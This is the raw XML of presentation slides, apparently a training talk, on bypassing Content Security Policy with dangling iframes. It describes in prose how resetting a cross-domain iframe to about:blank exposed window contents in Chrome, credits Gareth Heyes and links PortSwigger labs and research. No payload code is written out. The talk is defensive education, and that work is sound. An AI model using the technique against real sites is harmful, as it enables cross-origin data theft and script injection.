            <a:endParaRPr lang="en-MY"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81" y="1329469"/>
            <a:ext cx="6153216" cy="1731323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3922615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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4. Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>he location of the iframe to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="20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153818" y="984800"/>
            <a:ext cx="9038746" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By inspecting multiples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>properties of the cross-domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe, find and change the values as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change the location </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of the iframe to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about:blank</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153818" y="2342438"/>
            <a:ext cx="8452301" cy="2646878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>though this was cross-domain, somehow Chrome allowed it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After changing it, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>full window was able to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enumerated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Moreover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>could be read and write. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XSS Injection) and we have successfully bypass the CSP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you assign it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the ownership of the iframe changes to the domain that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we will set.</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81" y="1603775"/>
            <a:ext cx="4648426" cy="536860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35486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153818" y="68713"/>
            <a:ext cx="8520600" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213026" y="586728"/>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153818" y="675313"/>
            <a:ext cx="9038746" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP treats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> URLs as the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a cross domain iframe to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, it becomes readable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by us even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we are not in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In this case, we just performed a Bug Hunting (Where this bug firstly discovered by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gareth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gareth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> then report the bug to Google. And for sure, Google will update their Chrome 97 and fix this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is why Applications always get updated. Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whitehat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hackers would always hack to find bug. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now you know how exactly they do it. Interesting right? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> be like them one day?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6782348" y="1603774"/>
            <a:ext cx="184731" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY"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892" y="2806095"/>
            <a:ext cx="3901089" cy="2197796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1350368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Proof Of Concept (POC)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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t>TOOLS</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="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t>LABS</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="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smtClean="0"/>
              <a:t>EXPLOITS</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="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t>SOLUTIONS</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="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PORTSWIGGER LABS</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5755288" y="3913772"/>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811710" y="3959549"/>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862304" y="3942122"/>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5862304" y="3942122"/>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4533243" y="2685639"/>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40363" y="2102817"/>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206705" y="2264610"/>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098100" y="1730320"/>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5862720" y="3363027"/>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5040768" y="3541811"/>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821464" y="3541811"/>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850089" y="3685313"/>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821464" y="3250202"/>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6200185" y="3250202"/>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5222664" y="2974770"/>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520376" y="2673188"/>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4915294" y="1718286"/>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085669" y="2077936"/>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6228594" y="2090386"/>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126874" y="2254242"/>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7483000" y="3360547"/>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6931913" y="3670417"/>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6942083" y="1954742"/>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6942480" y="1729071"/>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7167733" y="1729488"/>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7167733" y="1955158"/>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6596946" y="1512124"/>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6577554" y="1655937"/>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806196" y="1415892"/>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927724" y="1437878"/>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912085" y="1503004"/>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499761" y="3054408"/>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5067948" y="2618848"/>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7377623" y="3141520"/>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7377623" y="3141520"/>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3973241" y="1899152"/>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3973241" y="1874271"/>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7398996" y="2478637"/>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6011231" y="2517223"/>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5990077" y="2629632"/>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5936569" y="2016953"/>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5938631" y="1996633"/>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940296" y="1976312"/>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924119" y="2077777"/>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5929511" y="2057199"/>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5933655" y="2037294"/>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5903382" y="2135588"/>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5911252" y="2116516"/>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5917894" y="2096195"/>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5874338" y="2189929"/>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5885539" y="2172879"/>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5894659" y="2154263"/>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5838672" y="2240959"/>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5851103" y="2224365"/>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5863553" y="2208148"/>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5795533" y="2285347"/>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5810877" y="2272025"/>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5824557" y="2256304"/>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5747001" y="2324344"/>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5763594" y="2311477"/>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5779772" y="2299443"/>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5693473" y="2355449"/>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5711732" y="2345497"/>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5729991" y="2335129"/>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5636654" y="2378685"/>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5655725" y="2372380"/>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5674817" y="2364153"/>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5576504" y="2394446"/>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5596408" y="2389470"/>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5616749" y="2384910"/>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5515105" y="2401087"/>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5535842" y="2399422"/>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5556183" y="2397340"/>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5453310" y="2397340"/>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5473631" y="2399422"/>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5494368" y="2400671"/>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5391912" y="2384910"/>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5412232" y="2390302"/>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5432573" y="2394446"/>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5333427" y="2363736"/>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5352915" y="2372043"/>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5372423" y="2378685"/>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5278670" y="2335129"/>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5296513" y="2346330"/>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5314752" y="2355449"/>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5228473" y="2299027"/>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5244650" y="2311893"/>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260827" y="2323927"/>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5183668" y="2256304"/>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5197783" y="2271648"/>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5212712" y="2285347"/>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5145921" y="2207771"/>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5157954" y="2224365"/>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5170821" y="2240542"/>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5115231" y="2154263"/>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5124767" y="2172522"/>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5135136" y="2190761"/>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5093245" y="2097424"/>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5099470" y="2116516"/>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5107341" y="2135588"/>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5079149" y="2037294"/>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5083293" y="2057199"/>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5087436" y="2077520"/>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5074570" y="1975895"/>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5074986" y="1996633"/>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076651" y="2016953"/>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076651" y="1537837"/>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5056747" y="1960551"/>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5493952" y="2382412"/>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5921224" y="1960551"/>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5150084" y="1616662"/>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6102491" y="1835415"/>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6115754" y="1847568"/>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395121" y="2464548"/>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9585" y="2488179"/>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4419585" y="2537128"/>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4525372" y="249275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525372" y="2510166"/>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4525372" y="2527176"/>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4525372" y="2544186"/>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525372" y="2561196"/>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4525372" y="2578206"/>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4525372" y="259563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4525372" y="2612642"/>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4535741" y="2391531"/>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4535741" y="2403565"/>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4535741" y="2415183"/>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4535741" y="2357115"/>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4535741" y="2368316"/>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4535741" y="2379914"/>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4535741" y="2321846"/>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4535741" y="2333047"/>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4535741" y="2345081"/>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4535741" y="2286596"/>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4535741" y="2298194"/>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4535741" y="2309812"/>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4535741" y="2251327"/>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4535741" y="2263361"/>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4535741" y="2274563"/>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4535741" y="2216494"/>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4535741" y="2228092"/>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4535741" y="2239710"/>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4534492" y="2181225"/>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4535741" y="2193259"/>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4535741" y="2204461"/>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4531577" y="2145976"/>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4533243" y="2157990"/>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4534075" y="2169191"/>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4523290" y="2111956"/>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4526185" y="2123157"/>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4529516" y="2134775"/>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4511257" y="2078769"/>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4515400" y="2089553"/>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4519563" y="2100338"/>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4494663" y="2047663"/>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4500472" y="2058031"/>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4506280" y="2067567"/>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4474342" y="2018619"/>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4481816" y="2027738"/>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4488438" y="2037294"/>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4451107" y="1992073"/>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4459414" y="2000776"/>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4467284" y="2009083"/>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4424561" y="1969254"/>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4433681" y="1976312"/>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442404" y="1984182"/>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4395517" y="1950182"/>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4405489" y="1956387"/>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4415441" y="1962613"/>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4363995" y="1934401"/>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4374780" y="1938981"/>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4385149" y="1944373"/>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4330808" y="1923220"/>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4342425" y="1926114"/>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4353210" y="1930258"/>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4296807" y="1916162"/>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4308425" y="1917827"/>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4319606" y="1920305"/>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4261955" y="1913664"/>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4273989" y="1914080"/>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284774" y="1915329"/>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7155576" y="2000704"/>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7107350" y="1925981"/>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7136274" y="1965791"/>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7136274" y="1965791"/>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7076006" y="1885019"/>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7107350" y="1925981"/>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7493362" y="276777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7493362" y="2755324"/>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7493362" y="2742894"/>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7493362" y="280510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7493362" y="2792655"/>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7493362" y="2780225"/>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7493362" y="284285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7493362" y="2830403"/>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7493362" y="2817972"/>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7493362" y="2880184"/>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7493362" y="2867753"/>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7493362" y="2855303"/>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7493362" y="2917515"/>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7493362" y="2905084"/>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7493362" y="2892634"/>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7493362" y="2954865"/>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7493362" y="294241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7493362" y="292996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7493362" y="2992613"/>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7493362" y="2980162"/>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7493362" y="296771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7493362" y="3029944"/>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7493362" y="301749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493362" y="3005043"/>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7493362" y="3067274"/>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493362" y="3054824"/>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7493362" y="3042374"/>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6513165" y="3235273"/>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6338525" y="2485285"/>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6369631" y="2516391"/>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6427282" y="2692153"/>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6427282" y="2640834"/>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6427282" y="2741102"/>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6427282" y="284218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6427282" y="289471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6427282" y="2944139"/>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6927968" y="3502418"/>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6944561" y="3583305"/>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6908063" y="3486657"/>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6968629" y="3462173"/>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7012601" y="3486657"/>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5700332" y="4055938"/>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5432753" y="1934365"/>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91" name="Google Shape;991;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487505" y="1861756"/>
            <a:ext cx="3356022" cy="1736561"/>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 sz="1400" dirty="0" smtClean="0"/>
              <a:t>Here, Portswigger provided labs for you to bypass the CSP Using Dangling Iframe. Try it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="1400" b="1" dirty="0"/>
              <a:t>://portswigger-labs.net/bypassing-csp-with-dangling-iframes/attacker.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="995" name="Google Shape;995;p36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3083978" y="3598317"/>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7143003" y="1438892"/>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Exploit to Solve the Labs</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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57" y="1528584"/>
            <a:ext cx="8616543" cy="266844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326581" y="526139"/>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RESOURCES</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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MY" dirty="0" err="1" smtClean="0"/>
              <a:t>Portswigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0"/>
              <a:t> Bypassing CSP with Dangling Iframes</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>portswigger.net/research/bypassing-csp-with-dangling-iframes</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0" smtClean="0">
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>https://portswigger-labs.net/hackability/inspector/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" smtClean="0">
                <a:uFill>
